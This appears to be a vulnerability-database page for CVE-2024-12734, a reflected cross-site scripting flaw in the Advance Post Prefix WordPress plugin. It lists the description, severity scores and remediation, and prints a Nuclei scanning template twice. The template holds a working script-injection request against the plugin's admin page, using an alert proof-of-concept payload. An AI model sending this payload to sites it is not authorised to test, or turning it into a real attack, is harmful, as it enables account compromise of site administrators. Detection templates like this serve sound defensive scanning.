Advance Post Prefix WordPress plugin - Reflected XSS

CVE-2024-12734

Verified

Description

Advance Post Prefix WordPress plugin through 1.1.1 contains a reflected cross-site scripting caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Affected Product

advance_post_prefix

Published Date

February 5, 2026

Template Author

sourabh-sahu

CVE-2024-12734.yaml

id: CVE-2024-12734

info:
  name: Advance Post Prefix WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Advance Post Prefix WordPress plugin through 1.1.1 contains a reflected cross-site scripting caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version of Advance Post Prefix WordPress plugin.
  reference:
    - https://wpscan.com/vulnerability/038b44dc-0495-4f56-ae7e-c78a265aa535/
    - https://nvd.nist.gov/vuln/detail/cve-2024-12734
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12734
    cwe-id: CWE-79
    epss-score: 0.00199
    epss-percentile: 0.41725
    cpe: cpe:2.3:a:niceit:advance_post_prefix:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: niceit
    product: advance_post_prefix
  tags: cve,cve2024,niceit,advance-post-prefix,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=add-prefix&post="></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`","advance-post-prefix")
        condition: and
# digest: 4b0a00483046022100f8f5be84695a9407cacecaafd28b99aac08148e5cc55230b311f7233762c6c7c0221008e8a076440212ef7f6ae93a61b9c3feb16f933f7c4d5bb5f5cfea67254039800:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2024-12734

CWE ID:

cwe-79

References

https://wpscan.com/vulnerability/038b44dc-0495-4f56-ae7e-c78a265aa535/https://nvd.nist.gov/vuln/detail/cve-2024-12734

Remediation Steps

Update to the latest version of Advance Post Prefix WordPress plugin.

id: CVE-2024-12734

info:
  name: Advance Post Prefix WordPress plugin - Reflected XSS
  author: Sourabh-Sahu
  severity: medium
  description: |
    Advance Post Prefix WordPress plugin through 1.1.1 contains a reflected cross-site scripting caused by unsanitized and unescaped parameter output, letting attackers execute scripts against high privilege users such as admin, exploit requires crafted request.
  impact: |
    Attackers can execute scripts in admin users' browsers, potentially leading to account compromise or unauthorized actions.
  remediation: |
    Update to the latest version of Advance Post Prefix WordPress plugin.
  reference:
    - https://wpscan.com/vulnerability/038b44dc-0495-4f56-ae7e-c78a265aa535/
    - https://nvd.nist.gov/vuln/detail/cve-2024-12734
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-12734
    cwe-id: CWE-79
    epss-score: 0.00199
    epss-percentile: 0.41725
    cpe: cpe:2.3:a:niceit:advance_post_prefix:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: niceit
    product: advance_post_prefix
  tags: cve,cve2024,niceit,advance-post-prefix,wordpress,wp,wp-plugin,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=

    matchers:
      - type: dsl
        dsl:
          - contains(header, "wordpress_logged_in")
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=add-prefix&post="></script><script>alert(document.domain)</script><script>` HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>`","advance-post-prefix")
        condition: and
# digest: 4b0a00483046022100f8f5be84695a9407cacecaafd28b99aac08148e5cc55230b311f7233762c6c7c0221008e8a076440212ef7f6ae93a61b9c3feb16f933f7c4d5bb5f5cfea67254039800:922c64590222798bb761d5b6d8e72950

Advance Post Prefix WordPress plugin - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Advance Post Prefix WordPress plugin - Reflected XSS

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps